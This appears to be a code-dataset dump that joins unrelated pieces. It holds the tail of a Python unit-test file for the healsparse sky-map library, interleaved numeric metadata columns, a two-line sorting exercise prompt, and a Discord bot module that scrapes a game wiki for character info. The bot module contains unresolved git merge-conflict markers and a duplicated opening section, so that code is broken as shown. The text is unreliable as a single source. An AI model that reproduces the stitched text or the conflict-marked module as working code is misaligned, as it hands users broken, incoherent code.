sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.int64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
# Get a random list of integers
values1 = np.random.poisson(size=pixel1.size, lam=2)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.int64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.poisson(size=pixel2.size, lam=2)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.int64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.poisson(size=pixel3.size, lam=2)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# _intersection xor
# xor 2
xor_map_intersection = healsparse.xor_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_xor_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_xor_intersection[gd] = hpmap1[gd].astype(np.int64) ^ hpmap2[gd].astype(np.int64)
testing.assert_almost_equal(hpmap_xor_intersection, xor_map_intersection.generate_healpix_map())
# xor 3
xor_map_intersection = healsparse.xor_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_xor_intersection = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_xor_intersection[gd] = (hpmap1[gd].astype(np.int64) ^
hpmap2[gd].astype(np.int64) ^
hpmap3[gd].astype(np.int64))
testing.assert_almost_equal(hpmap_xor_intersection, xor_map_intersection.generate_healpix_map())
# Union xor
# xor 2
xor_map_union = healsparse.xor_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_xor_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_xor_union[gd] = 0.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd1]] = (hpmap_xor_union[gd[gd1]].astype(np.int64) ^
hpmap1[gd[gd1]].astype(np.int64))
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd2]] = (hpmap_xor_union[gd[gd2]].astype(np.int64) ^
hpmap2[gd[gd2]].astype(np.int64))
testing.assert_almost_equal(hpmap_xor_union, xor_map_union.generate_healpix_map())
# xor 3
xor_map_union = healsparse.xor_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_xor_union = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_xor_union[gd] = 0.0
gd1, = np.where(hpmap1[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd1]] = (hpmap_xor_union[gd[gd1]].astype(np.int64) ^
hpmap1[gd[gd1]].astype(np.int64))
gd2, = np.where(hpmap2[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd2]] = (hpmap_xor_union[gd[gd2]].astype(np.int64) ^
hpmap2[gd[gd2]].astype(np.int64))
gd3, = np.where(hpmap3[gd] > hp.UNSEEN)
hpmap_xor_union[gd[gd3]] = (hpmap_xor_union[gd[gd3]].astype(np.int64) ^
hpmap3[gd[gd3]].astype(np.int64))
testing.assert_almost_equal(hpmap_xor_union, xor_map_union.generate_healpix_map())
# Test xorring an int constant to a map
xor_map = sparse_map1 ^ 2
hpmap_xor2 = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_xor2[gd] = hpmap1[gd].astype(np.int64) ^ 2
testing.assert_almost_equal(hpmap_xor2, xor_map.generate_healpix_map())
# Test xorring an int constant to a map, in place
sparse_map1 ^= 2
testing.assert_almost_equal(hpmap_xor2, sparse_map1.generate_healpix_map())
def test_miscellaneous_operations(self):
"""
Test miscellaneous constant operations.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
# subtraction
test_map = sparse_map1 - 2.0
hpmap_test = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_test[gd] = hpmap1[gd] - 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
test_map = sparse_map1.copy()
test_map -= 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
# division
test_map = sparse_map1 / 2.0
hpmap_test = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_test[gd] = hpmap1[gd] / 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
test_map = sparse_map1.copy()
test_map /= 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
# power
test_map = sparse_map1 ** 2.0
hpmap_test = np.zeros_like(hpmap1) + hp.UNSEEN
gd, = np.where(hpmap1 > hp.UNSEEN)
hpmap_test[gd] = hpmap1[gd] ** 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
test_map = sparse_map1.copy()
test_map **= 2.0
testing.assert_almost_equal(hpmap_test, test_map.generate_healpix_map())
def test_max_intersection(self):
"""
Test map maximum of the intersection.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the maximum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Maximum of 2
max_map = healsparse.max_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_max = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_max[gd] = np.fmax(hpmap1[gd], hpmap2[gd])
testing.assert_almost_equal(hpmap_max, max_map.generate_healpix_map())
# Maximum of 3
max_map = healsparse.max_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_max = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_max[gd] = np.fmax(hpmap1[gd], hpmap2[gd])
hpmap_max[gd] = np.fmax(hpmap_max[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_max, max_map.generate_healpix_map())
def test_min_intersection(self):
"""
Test map minimum of the intersection.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the minimum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Minimum of 2
min_map = healsparse.min_intersection([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_min = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_min[gd] = np.fmin(hpmap1[gd], hpmap2[gd])
testing.assert_almost_equal(hpmap_min, min_map.generate_healpix_map())
# Minimum of 3 intersection
min_map = healsparse.min_intersection([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_min = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_min[gd] = np.fmin(hpmap1[gd], hpmap2[gd])
hpmap_min[gd] = np.fmin(hpmap_min[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_min, min_map.generate_healpix_map())
def test_max_union(self):
"""
Test map maximum of the union.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the maximum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Maximum of 2 map union
max_map = healsparse.max_union([sparse_map1, sparse_map2])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN))
hpmap_max = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_max[gd] = np.fmax(hpmap1[gd], hpmap2[gd])
testing.assert_almost_equal(hpmap_max, max_map.generate_healpix_map())
# Maximum of 3 map union
max_map = healsparse.max_union([sparse_map1, sparse_map2, sparse_map3])
gd, = np.where((hpmap1 > hp.UNSEEN) | (hpmap2 > hp.UNSEEN) | (hpmap3 > hp.UNSEEN))
hpmap_max = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_max[gd] = np.fmax(hpmap1[gd], hpmap2[gd])
hpmap_max[gd] = np.fmax(hpmap_max[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_max, max_map.generate_healpix_map())
def test_min_union(self):
"""
Test map minimum of the union.
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the minimum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Minimum of the union 2
min_map = healsparse.min_union([sparse_map1, sparse_map2])
# This is tricky because UNSEEN it's a float
hpmap1[hpmap1 == hp.UNSEEN] = -hp.UNSEEN
hpmap2[hpmap2 == hp.UNSEEN] = -hp.UNSEEN
gd, = np.where((hpmap1 < -hp.UNSEEN) | (hpmap2 < -hp.UNSEEN))
hpmap_min = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_min[gd] = np.fmin(hpmap1[gd], hpmap2[gd]) # This would be the intersection
testing.assert_almost_equal(hpmap_min, min_map.generate_healpix_map())
# Maximum of 3
min_map = healsparse.min_union([sparse_map1, sparse_map2, sparse_map3])
hpmap1[hpmap1 == hp.UNSEEN] = -hp.UNSEEN
hpmap2[hpmap2 == hp.UNSEEN] = -hp.UNSEEN
hpmap3[hpmap3 == hp.UNSEEN] = -hp.UNSEEN
gd, = np.where((hpmap1 < -hp.UNSEEN) | (hpmap2 < -hp.UNSEEN) | (hpmap3 < -hp.UNSEEN))
hpmap_min = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_min[gd] = np.fmin(hpmap1[gd], hpmap2[gd])
hpmap_min[gd] = np.fmin(hpmap_min[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_min, min_map.generate_healpix_map())
def test_ufunc_intersection(self):
"""
Test numpy's ufunc on the intersection of HealSparseMaps
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the minimum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Test an example ufunc (np.add) with 2 maps
add_map = healsparse.ufunc_intersection([sparse_map1, sparse_map2], np.add)
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN))
hpmap_add = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_add[gd] = np.add(hpmap1[gd], hpmap2[gd])
testing.assert_almost_equal(hpmap_add, add_map.generate_healpix_map())
# Test an example ufunc (np.add) with 3 maps
add_map = healsparse.ufunc_intersection([sparse_map1, sparse_map2, sparse_map3], np.add)
gd, = np.where((hpmap1 > hp.UNSEEN) & (hpmap2 > hp.UNSEEN) & (hpmap3 > hp.UNSEEN))
hpmap_add = np.zeros_like(hpmap1) + hp.UNSEEN
hpmap_add[gd] = np.add(hpmap1[gd], hpmap2[gd])
hpmap_add[gd] = np.add(hpmap_add[gd], hpmap3[gd])
testing.assert_almost_equal(hpmap_add, add_map.generate_healpix_map())
def test_ufunc_union(self):
"""
Test numpy's ufunc on the intersection of HealSparseMaps
"""
random.seed(seed=12345)
nside_coverage = 32
nside_map = 64
# Test the minimum of two or three maps
sparse_map1 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel1 = np.arange(4000, 20000)
pixel1 = np.delete(pixel1, 15000)
values1 = np.random.random(size=pixel1.size)
sparse_map1.update_values_pix(pixel1, values1)
hpmap1 = sparse_map1.generate_healpix_map()
sparse_map2 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel2 = np.arange(15000, 25000)
values2 = np.random.random(size=pixel2.size)
sparse_map2.update_values_pix(pixel2, values2)
hpmap2 = sparse_map2.generate_healpix_map()
sparse_map3 = healsparse.HealSparseMap.make_empty(nside_coverage, nside_map, np.float64)
pixel3 = np.arange(16000, 25000)
values3 = np.random.random(size=pixel3.size)
sparse_map3.update_values_pix(pixel3, values3)
hpmap3 = sparse_map3.generate_healpix_map()
# Test an example ufunc (np.add) with 2 maps
add_map = healsparse.ufunc_union([sparse_map1, sparse_map2], np.add)
# This is tricky again because hp.UNSEEN is a float
mask = (hpmap1 == hp.UNSEEN) & (hpmap2 == hp.UNSEEN)
hpmap1[hpmap1 == hp.UNSEEN] = 0
hpmap2[hpmap2 == hp.UNSEEN] = 0
hpmap_add = np.add(hpmap1, hpmap2)
hpmap_add[mask] = hp.UNSEEN
testing.assert_almost_equal(hpmap_add, add_map.generate_healpix_map())
# Test an example ufunc (np.add) with 3 maps
hpmap_add[mask] = 0
add_map = healsparse.ufunc_union([sparse_map1, sparse_map2, sparse_map3], np.add)
mask2 = (mask) & (hpmap3 == hp.UNSEEN)
hpmap3[hpmap3 == hp.UNSEEN] = 0
hpmap_add = np.add(hpmap_add, hpmap3)
hpmap_add[mask2] = hp.UNSEEN
testing.assert_almost_equal(hpmap_add, add_map.generate_healpix_map())
if __name__ == '__main__':
unittest.main()
| 40.765101
| 108
| 0.634296
| 5,390
| 42,518
| 4.756772
| 0.033581
| 0.051172
| 0.058973
| 0.046804
| 0.963181
| 0.952923
| 0.939623
| 0.922813
| 0.91158
| 0.899099
| 0
| 0.054177
| 0.259819
| 42,518
| 1,042
| 109
| 40.804223
| 0.76051
| 0.062679
| 0
| 0.751159
| 0
| 0
| 0.000203
| 0
| 0
| 0
| 0
| 0
| 0.085008
| 1
| 0.020093
| false
| 0
| 0.010819
| 0
| 0.032458
| 0.001546
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3aca91a9cbd67c66c6d0005e18075a9f7c61501
| 158
|
py
|
Python
|
Phase-2/Search and Sorting/Day-68.py
|
CodedLadiesInnovateTech/python-challenges
|
22ce26c68fea6c7c243ada831e47c52e27a62127
|
[
"MIT"
] | 11
|
2020-05-11T08:41:21.000Z
|
2022-02-27T08:21:37.000Z
|
Phase-2/Search and Sorting/Day-68.py
|
CodedLadiesInnovateTech/python-challenges
|
22ce26c68fea6c7c243ada831e47c52e27a62127
|
[
"MIT"
] | 9
|
2020-05-12T10:46:06.000Z
|
2020-05-28T17:37:19.000Z
|
Phase-2/Search and Sorting/Day-68.py
|
CodedLadiesInnovateTech/python-challenges
|
22ce26c68fea6c7c243ada831e47c52e27a62127
|
[
"MIT"
] | 44
|
2020-05-10T20:53:32.000Z
|
2021-04-25T18:47:08.000Z
|
'''
1. Write a Python program to sort a list of elements using Topological sort.
2. Write a Python program to sort a list of elements using Tree sort.
'''
| 19.75
| 76
| 0.727848
| 28
| 158
| 4.107143
| 0.5
| 0.104348
| 0.208696
| 0.330435
| 0.782609
| 0.782609
| 0.782609
| 0.782609
| 0.782609
| 0.782609
| 0
| 0.016
| 0.208861
| 158
| 7
| 77
| 22.571429
| 0.904
| 0.93038
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
6ce772f63a4242d85d030090866772727c1c1259
| 24,755
|
py
|
Python
|
Brynhildr/character.py
|
MyUncle/Brynhildr
|
41031f95f1e9a6a06a7633fd6c62d4fe2373fb49
|
[
"MIT"
] | null | null | null |
Brynhildr/character.py
|
MyUncle/Brynhildr
|
41031f95f1e9a6a06a7633fd6c62d4fe2373fb49
|
[
"MIT"
] | null | null | null |
Brynhildr/character.py
|
MyUncle/Brynhildr
|
41031f95f1e9a6a06a7633fd6c62d4fe2373fb49
|
[
"MIT"
] | null | null | null |
<<<<<<< HEAD:Brynhildr/character.py
import discord
from icons import iconreplace
from util import *
async def characterparse(categories: list, source: str, embed: discord.Embed,
simple: bool) -> None:
parsed = BeautifulSoup(source, 'html.parser')
# Generate the title of the embed
embed.title = source[source.find("wgTitle") + 10:].split('"', 1)[0]
# Generate icon line
await generateicons(categories, embed)
# Get description, and change apostrophe escape characters to actual
# apostrophe
if parsed.find("meta", {"name": "description"}):
description = parsed.find("meta", {"name": "description"})["content"] \
.replace("'", "'")
else:
description = ""
# Find character image
image = parsed.find("meta", {"property": "og:image"})["content"]
# Put the basic content together
embed.description += description
embed.set_thumbnail(url=image)
# Advanced lookup
if not simple:
# Generate advanced information
obtain = await generateobtain(source)
ca = await generateca(source)
skills = await generateskills(source)
supskills = await generatesupskills(source)
# Put it together
embed.add_field(name="How to Recruit", value=obtain, inline=True)
embed.add_field(name="Charge Attack" + ca[0], value=ca[1], inline=True)
# See comment in generateskills
for skill in skills:
embed.add_field(name=skill[0], value=skill[1], inline=False)
embed.add_field(name="Support Skills", value=supskills, inline=False)
async def generateicons(categories: list, embed: discord.Embed) \
-> None:
text = ""
cat_map = {
# Rarity icons
"SSR Characters": " <:Rarity_SSR:730441789667934278>",
"SR Characters": " <:Rarity_SR:730441789319807009>",
"R Characters": " <:Rarity_R:730441789642768464>",
# Element icons
"Fire Characters": " <:Fire:730845600484032624>",
"Water Characters": " <:Water:730845600324780151>",
"Earth Characters": " <:Earth:730845600672776202>",
"Wind Characters": " <:Wind:730845600479707157>",
"Light Characters": " <:Light:730845600915914873>",
"Dark Characters": " <:Dark:730845600613924954>",
# Category icons
"Summer Characters": " <:Summer:793505682250661929>",
"Yukata Characters": " <:Yukata:793506721817034763>",
"Valentine Characters": " <:Valentine:793507530185768980>",
"Halloween Premium Draw Characters": " <:Halloween:793508939723309058>",
"Holiday Premium Draw Characters": " <:Holiday:793509924922720287>",
"Zodiac Characters": " <:Zodiac:793510822282133565>",
"Grand Series Characters": " <:Grand:793511553026359316>",
"Fantasy Characters": " <:Fantasy:793511553134624788>",
"Collaboration Characters": " <:TieIn:793504971173527582>",
"The Eternals": " <:Eternals:793503906347876362>",
"Arcarum Evokers": " <:Evokers:793501266054479913>",
# Race icons
"Draph Characters":
" <:Draph1:731182416441376808><:Draph2:731182416475193464>"
"<:Draph3:731182416407822376><:Draph4:731182416030466070>",
"Erune Characters":
" <:Erune1:731181941662941184><:Erune2:731181942170583060>"
"<:Erune3:731181941474197505><:Erune4:731181941646426133>",
"Harvin Characters":
" <:Harvin1:731177969992859844><:Harvin2:731177970177278023>"
"<:Harvin3:731177970416353280><:Harvin4:731177970353569854>",
"Human Characters":
" <:Human1:731174811774091304><:Human2:731174811518238822>"
"<:Human3:731174811648262155><:Human4:731174811857977384>",
"Other Characters":
" <:Unknown1:731183072850083942><:Unknown2:731183073026375811>"
"<:Unknown3:731183073101742110><:Unknown4:731183072862666813>",
"Primal Characters":
" <:Primal1:731173612035244052><:Primal2:731173611918065684>"
"<:Primal3:731173290848157696><:Primal4:731173290806214736>",
# Weapon proficiency icons
"Sabre Characters":
" <:Sabre1:730454365248159855><:Sabre2:730454663941324861>",
"Dagger Characters":
" <:Dagger1:730455370233020558><:Dagger2:730455370673291314>",
"Spear Characters":
" <:Spear1:730456104898920458><:Spear2:730456104840200363>",
"Axe Characters":
" <:Axe1:730456397942095943><:Axe2:730456397556482110>",
"Staff Characters":
" <:Staff1:730456836221829173><:Staff2:730456836310040677>",
"Gun Characters":
" <:Gun1:730457164552077382><:Gun2:730457164266864784>",
"Melee Characters":
" <:Melee1:730457549672939621><:Melee2:730457549337264139>",
"Bow Characters":
" <:Bow1:730457814627254322><:Bow2:730457814551756840>",
"Harp Characters":
" <:Harp1:730458095591096420><:Harp2:730458095221997580>",
"Katana Characters":
" <:Katana1:730458503742750822><:Katana2:730458504011317319>",
# 5★ uncap icons
"5★ Characters": " <:BlueStar:739887435936301152>",
}
for cat in categories:
if cat in cat_map.keys():
text += cat_map[cat]
embed.description = text + "\n"
async def generateobtain(source: str) -> str:
# Trim
raw = source[source.find("How to Recruit") + 14:].split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, 'html.parser')
# Get information and put it together
link = parsed.find("a")["href"]
text = parsed.find("a").text
obtain = "[" + text + "](https://gbf.wiki" + link + ")"
# If the character is obtained via a recruitment weapon, get that too.
if "Recruitment Weapon" in parsed.text:
recruit = parsed.find("span", {"class": "image_link"})
link = recruit.find("a")["href"]
text = recruit.text.strip()
obtain += "\n**Recruitment Weapon**\n[" + text + "](https://gbf.wiki" \
+ link + ")"
return obtain
async def generateca(source: str) -> list:
# Empty variables to be filled later
name = ""
output = []
outputtext = ""
# Trim the source
raw = source[source.find("/Charge_Attack"):].split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, 'html.parser')
# Miscellaneous cleaning
removetooltip(parsed)
removecitation(parsed)
iconreplace(parsed)
# Check if the CA eventually gets another name
if len(parsed.find_all("td", {"class": "skill-name"})) > 1:
namechange = True
else:
namechange = False
for tr in parsed.find_all("tr"):
# If the row has styling, it's a dud row
if tr.get("style"):
continue
# If the row has a "skill" upgrade, add it in mark it as such, then
# Remove it to prevent double inclusion
if tr.find("td", {"class": "skill-name"}) and not namechange:
name = " - " + tr.find("td", {"class": "skill-name"}).text
tr.find("td", {"class": "skill-name"}).replace_with("")
if tr.find("span", {"class": "skill-upgrade-text"}):
if namechange:
outputtext += "__" + tr.find("span", {"class":
"skill-upgrade-text"}).text + \
"__\n"
tr.find("span", {"class": "skill-upgrade-text"})\
.replace_with("")
else:
tr.find("span", {"class": "skill-upgrade-text"}) \
.replace_with("\n__" + tr.find("span", {"class":
"skill-upgrade-text"}).text + "__\n")
td = tr.find("td", {"style": "text-align:left;"})
for br in td.find_all("br"):
br.replace_with(" ")
if namechange:
outputtext += "**" + tr.find("td", {"class": "skill-name"}).text + \
":** " + td.text + "\n"
else:
outputtext += td.text
output.append(name)
output.append(outputtext)
return output
async def generateskills(source) -> list:
# Skills are too big to put in one field, so this generates the information
# for each skill to be displayed in its own field.
output = []
# Trim to what's needed
raw = source[source.find("<span class=\"mw-headline\" id=\"Skills\">"):]\
.split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, "html.parser")
parsed = parsed.find("table")
# Miscellaneous cleaning
removetooltip(parsed)
removecitation(parsed)
iconreplace(parsed)
# Skill counter and text buffer for the skill info
i = 1
skillinfo = ""
for tr in parsed.find_all("tr"):
if tr.find_all("th"):
continue
if tr.get("class"):
continue
# Get the cell with the skill name
td = tr.find("td", {"class": "skill-name"})
# Handle any skill name changes
for span in td.find_all("span", {"class": "skill-upgrade-text"}):
for br in span.find_all("br"):
br.replace_with(" ")
span.replace_with("/" + span.text)
skillname = "Skill " + str(i) + ": " + td.text.strip()
# The next three cells don't have a class identifier, so you just have
# to hope the table format stays consistent with all cases
td = tr.find_all("td", {"class": None})
# The first unmarked cell is for the cooldown, which needs handling of
# potential cooldown reductions and linked skills
for span in td[0].find_all("span"):
if "Linked" not in span.text:
span.replace_with("/" + span.text + " ")
else:
span.replace_with("(Linked Skill) ")
skillinfo += "Cooldown: " + td[0].text + "\n"
# The second unmarked cell is for the duration, which needs handling of
# potential upgrades
for span in td[1].find_all("span"):
span.replace_with("/" + span.text + " ")
skillinfo += "Duration: " + td[1].text + "\n"
for span in td[2].find_all("span"):
span.replace_with("/" + span.text)
# The third unmarked cell is for the obtain level, which also includes
# potential upgrades
skillinfo += "Obtained: " + td[2].text + "\n"
# The cell with skill information apparently doesn't have an identifier,
# but it DOES always have a specific styling.
td = tr.find("td", {"style": "text-align:left;"})
for br in td.find_all("br"):
br.replace_with(" ")
for span in td.find_all("span", {"class": "skill-upgrade-text"}):
span.replace_with("\n__" + span.text + "__")
skillinfo += td.text + "\n"
output.append((skillname, skillinfo))
skillinfo = ""
i += 1
return output
async def generatesupskills(source: str) -> str:
output = ""
raw = source[source.find
("<span class=\"mw-headline\" id=\"Support_Skills\">"):] \
.split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, "html.parser")
parsed = parsed.find("table")
removetooltip(parsed)
removecitation(parsed)
iconreplace(parsed)
for tr in parsed.find_all("tr"):
if tr.find_all("th"):
continue
if tr.get("class"):
continue
output += "**" + tr.find("td", {"class": "skill-name"}).text.strip() + \
"**\n"
if "Extended" in tr.find("td", {"class": "skill-name"}).text:
td = tr.find_all("td", {"style": ""})[1]
else:
td = tr.find_all("td", {"style": ""})[2]
for span in td.find_all("span", {"class": "tooltip"}):
span.replace_with("/" + span.text)
output += "Obtained: " + td.text.strip() + "\n"
td = tr.find("td", {"style": "text-align:left;"})
for span in td.find_all("span", {"class": "skill-upgrade-text"}):
span.replace_with("\n__" + span.text + "__")
for br in td.find_all("br"):
br.replace_with(" ")
output += td.text + "\n"
return output
=======
import discord
from icons import iconreplace
from util import *
async def characterparse(categories: list, source: str, embed: discord.Embed,
simple: bool) -> None:
parsed = BeautifulSoup(source, 'html.parser')
# Generate the title of the embed
embed.title = source[source.find("wgTitle") + 10:].split('"', 1)[0]
# Generate icon line
await generateicons(categories, embed)
# Get description, and change apostrophe escape characters to actual
# apostrophe
if parsed.find("meta", {"name": "description"}):
description = parsed.find("meta", {"name": "description"})["content"] \
.replace("'", "'")
else:
description = ""
# Find character image
image = parsed.find("meta", {"property": "og:image"})["content"]
# Put the basic content together
embed.description += description
